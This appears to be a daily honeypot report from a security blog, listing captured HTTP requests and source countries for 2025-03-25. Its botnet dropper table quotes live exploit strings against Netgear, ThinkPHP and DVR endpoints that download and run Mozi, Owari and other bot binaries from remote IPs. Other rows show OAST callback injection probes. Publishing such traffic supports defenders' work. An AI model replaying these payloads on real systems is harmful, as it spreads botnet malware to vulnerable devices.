Skip to main content
  1. Daily-Posts/

Report: 2025-03-25

·553 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-03-25
#

interaction report on http service of various Hhoneypot around the world.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
FRAustralia
CNGeorgia
RO
IT
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
103.208.105.225GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.208.105.225:45070/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
113.59.144.13927;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
87.121.84.41POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
87.121.84.195POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
185.191.127.222POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
185.191.127.222POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F103.153.68.112%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
121.22.35.6GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
217.160.89.196GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://45.137.70.156/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
200.81.185.179GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://157.230.218.54/bins/nine.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
84.195.192.75GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
58.93.52.144GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1834GET /pi.php HTTP/1.1
2533GET /js/jquery-ui.mainControllers.js HTTP/1.1
2582GET /login/signin.css HTTP/1.1
2782GET /authenticationendpoint/2unmxagbusfz26izqi9mdvqpi5g.jsp HTTP/1.1
2792POST /xmlrpc HTTP/1.1
2802POST /fileupload/toolsAny HTTP/1.1
2812POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.cvh6v8ndueip41jikc8gherai8iouqkgg.oast.pro) HTTP/1.1
2822POST /goanywhere/lic/accept HTTP/1.1
2832GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName(‘cvh6v8ndueip41jikc8grfzypjgb8hnky.oast.pro’)}&mgrDn=a&pwd=a HTTP/1.1
2842POST /SamlResponseServlet HTTP/1.1
3031\x00\x0E8\x1B\xC1j\xEF*3\xDC\x02\x00\x00\x00\x00\x00
3081GET /allversions HTTP/1.1
3091GET /versions HTTP/1.1
3101GET /r-seenet/index.php HTTP/1.1
3111GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1 HTTP/1.1
3121GET /tos/index.php?user/login HTTP/1.1
3131GET /c/login HTTP/1.1
3141GET /WebApp/js/UI_String.js HTTP/1.1
3151GET /login.aspx HTTP/1.1
3161GET /officescan/console/html/localization.js HTTP/1.1
3171GET /officescan/console/cgi/cgiChkMasterPwd.exe HTTP/1.1
3381GET /login/login.html HTTP/1.1
3391GET /dniapi/userInfos HTTP/1.1
3671\x00\x0E8r=\xF1\xAE.\xFE[4\x00\x00\x00\x00\x00
3741\x00\x0E8P\xA2\x8E\x847\x9D\xD9\xFC\x00\x00\x00\x00\x00
3891GET /Module1/js/Module_b1827afbcecf98cd0e40b9ee2187b3ac.js HTTP/1.1
3901GET /socket.io/1/?t=1742935486640 HTTP/1.1
4131\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x13\x01\xA8\xC0\xF0 \xFF$E\xFF/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xC4\xBF\xB4\xFC\x5C\xA8%\x92L\xA9\xD3\xA2\x9D#\xAB\xE6\x91D%bsb\x1Dv\xBC\xCFo\x8D\xFD\x1D\xFD\xDD\xEB\xDE\x13]j\x06\xAC\x9F\xF5\x87\xB6}\xBB\x1C\x03\xC9t\xB8\x9E\x8A\x9F#f\x915f)\xB0\xBFk\xA2\xC2\x8B\xEA\xAE\x97\xAE\xA1\x13\xEC\x1Dnm\x0C\x04\xF0\xF7\x95\xE9\xF23\xE8\xC1\xC5\x0B\xB5\xFD7l\xC9\xA2U\xE0\x9D\xF1\x03\xFEVi#
4151\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\x02\xEF\x85\x8E\x8E(\x15L\x05\x02\x00\x01\x00\x00\xA1\xAA
4451GET /bLmA HTTP/1.1
4461GET /ps7C HTTP/1.1
4631GET /Wh1l HTTP/1.1
4641GET /Qhn6 HTTP/1.1
4661\x00\x0E8o\x8F\x8E\xE01\x9CE\xC4\x00\x00\x00\x00\x00
4691GET /PuLK HTTP/1.1
4701GET /AqBi HTTP/1.1
4781\x00\x0E8\xBAH!\xB8\x1C\x83\xF6q\x00\x00\x00\x00\x00
4801\x05\x02\x00\x02
4811\x04\x01\x01\xBB@\xE9\xA2j\x00
4821\x04\x01\x01\xBB@\xE9\xA2iadm:12345\x00
4851GET /env.cgi HTTP/1.1
5071GET /socket.io/1/?t=1742879203601 HTTP/1.1
5081GET /socket.io/1/?t=1742879210358 HTTP/1.1
5091GET /socket.io/1/?t=1742879554555 HTTP/1.1
5101GET /socket.io/1/?t=1742931043620 HTTP/1.1
5161\x00\x0E8\xCDE\x82(\xCA\xB1{t\x00\x00\x00\x00\x00
5201GET /robots1.txt HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0830NL
1309US
2191BG
3131PL
4131HK
597FR
695DE
767CN
863RO
958BR
1058RU
1156GB
1253CH
1352PT
1445IT
1545VN
1639NO
1730SC
1826CA
1920JP
2018UA
2118IN
2215NG
2314VE
2413LT
2512ZA
269SG
279BE
289GH
297KR
304ID
314SA
324AZ
332ES
342SE
352GE
362AR
372CZ
382IE
391MC
401KH
411IR
421CL
431AU
441PK
451PA
461CO
471AE
481TW
491MD
501TR

Related

Report: 2025-03-24
·720 words
Repport Daily
Report: 2025-03-23
·2901 words
Repport Daily
Report: 2025-03-22
·4611 words
Repport Daily